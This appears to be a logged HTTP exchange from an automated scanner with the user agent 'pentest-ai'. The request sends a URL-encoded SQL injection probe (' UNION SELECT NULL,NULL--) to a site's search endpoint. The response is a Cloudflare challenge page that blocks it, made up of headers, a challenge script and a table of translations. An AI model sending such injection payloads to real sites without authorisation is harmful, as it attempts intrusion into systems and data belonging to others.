REQUEST:
GET https://my.myfirst.tech/search?username=%27%20UNION%20SELECT%20NULL%2CNULL--
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:18 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9368
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c847594f56a110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=uriIgxBnRppFTPgmo2tLF1PsIphP%2Fb8PYNfN8rdGd6alr3JqIdbCPvLcZbZwy4sjmclBk4W9Ex5%2BACX4WAjJUfkdljd43%2F797fsYmvxoDKTCY9N8u2gsEU00sw4lHl2cCqBXfXhL4KST4kOh9w%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c847594f56a110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'OnVzvyWVY9ISG6M5a6WL0cooGRRpQ7PB3V4Qe8sKVd4-1784281158-1.2.1.1-iIHWuLmZYTA8f6xqaIUqlB3wkwMlNsruI7RmbfPjVp9HtWMVV9FQpgEUvMtgsElJ',cITimeS: '1784281158',cRay: 'a1c847594f56a110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/search?username=%27+UNION+SELECT+NULL%2CNULL--\u0026__cf_chl_tk=sCI8qqvckUE8WnjMpF2ffuXqOeQNKGSm.KrEHdrnQZc-1784281158-1.0.1.1-evRAEPaup6TZq6LBMPiu2KlH.YAvw5idfcdxZzq9f4I",cvId: '3',cZone: 'my.myfirst.tech',fa:"/search?username=%27+UNION+SELECT+NULL%2CNULL--\u0026__cf_chl_f_tk=sCI8qqvckUE8WnjMpF2ffuXqOeQNKGSm.KrEHdrnQZc-1784281158-1.0.1.1-evRAEPaup6TZq6LBMPiu2KlH.YAvw5idfcdxZzq9f4I",md: '7.C4.HGSRx1zvygx2493bMVGcmc6Tm.xZ17XFg7Cx_U-1784281158-1.2.1.1-66Qy5UhcoWlqr20393SRkPGjl9O8QHw.OGiIoZit2_ohGugXb.MN6SHON4oRKz3.u8MUk7_pG0Avz4Rr3Ci2qOiEWnP7fQ4NCNNkWLNyYWTtOXCr3euu1TuyZZtNYDA4kKTjFJTndxa5OX2hvvz9NyOtXAh9tzXeDE3GUm_bUtklhmt94jRIeH_4GbAced2fCmzPWWLSqiI8Ii_QYiyTHAVT_5.d_23MGjYKGGgfIga8jOlTjgNxmZmxU00VKfhL0fBEApBjX.SAn8vAYRFAclBYZdTqmB_zHwStPtj0iHz7hf.DKIZUVRsRKx4joZZ9oFLpwic.UusNHxLAkPRVOfGD.JVae9DKvkLLq92ouilNc0GhTc.vvZWSGVMjXZBcUJSWMzZ9h9BhQjWQBDXn3OxXUliHpCMvq3JuD0U4PBZw1MnzF9L5JkJhQe1nV05ao68JwQIEe.wqjjxp6TQjp7H_dK1kcp2xPMn4gItDqKcxxiUtV7_IQNuPjY.hkQT2yEZV6gggbfXjrjU2JAwhfTELDA7AM8Yh790Dh1lV.CbDFdjok6jLXJJnqGXMY8YcJYW_ms6Eb.B5yoax0l4I4w0Tu1Ed6H2R._hvZlDXDK8iOLtD4E3SQgji2MUy7qYOZ9gvg5Av8YHyvPo697RD2AIlkL_FongBqlCEo0q6EkzTQEnFbvfrZaKvjGFL51xuNZ74VEWz6UZ9E2EVoE7DNJ7TDi5JXK8AGijv6yCLwwyjaPZhR2bUcREfS7Fs2U443ztcq6y.ichNe4iatI1JL6U7xI2zNAHUkeRovFcCc2H7uGOFerPWrolSon4pOJzrA7Wb7Z.TipsHmzlqinQOm.FWqcE6qTkdUlZZuerE5Qwl.4ZKw5DUdQa7lMeIm_5XueGgEx0Q.MH1qiathvYTv36lv.UvpJWc0aSOsLJoxifHnUjNi74mlRwMY6a2xctYCQMP9NYv9MEOMjBsKQVp2lDukTfeKEA493HuNdBflDXx9S4ctUwgjsvV4OO9OR895Kx6Re9syFCMZdXW0l_s6bTpNlbfD1VmAMKKwtyoNC.EEmUW7u1FNd_P7iwPMP7leAsVJ6bwzd0Vm5do7ngcyuotp166.xmzbxR31RnQsR6BtbafIm5KmM07h8HlIl4ui4nGFaf8KyRPvKZ7uZyLVCKXm10Ms_IHBDuO_c7uC1AysV04zFrbBnJSBhDo.Iub',mdrd: '1XLpl9_1_WpkBtf5NnqkV5ZCUqtJEl5Qk0oNWQSF6_E-1784281158-1.2.1.1-WY4tArSSo3M8QihRbdNRSn8i8.45HpjuIguaK7hauF8jw3cElM.zKvlYAz2Wbn4APZ9ApAnt1Ys7Inaowu3fPGQvcNdJ2wfsa_QtvtFsTsTLP1PZHHa0OvMFMfFrrFyt9F7tEJyEkQZ3FGAExvNIQcs2Tr2VK4t13ENjOickZbDwUp.X8Wv8_TcSymOaiOZw_jPQxh11zE5l7Idx.8_mwa6E6xLcQJ6usnk4ZlvrHCE7dE2tGihUA1Myogbxew6t',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c847594f56a110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/search?username=%27+UNION+SELECT+NULL%2CNULL--\u0026__cf_chl_rt_tk=sCI8qqvckUE8WnjMpF2ffuXqOeQNKGSm.KrEHdrnQZc-1784281158-1.0.1.1-evRAEPaup6TZq6LBMPiu2KlH.YAvw5idfcdxZzq9f4I"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
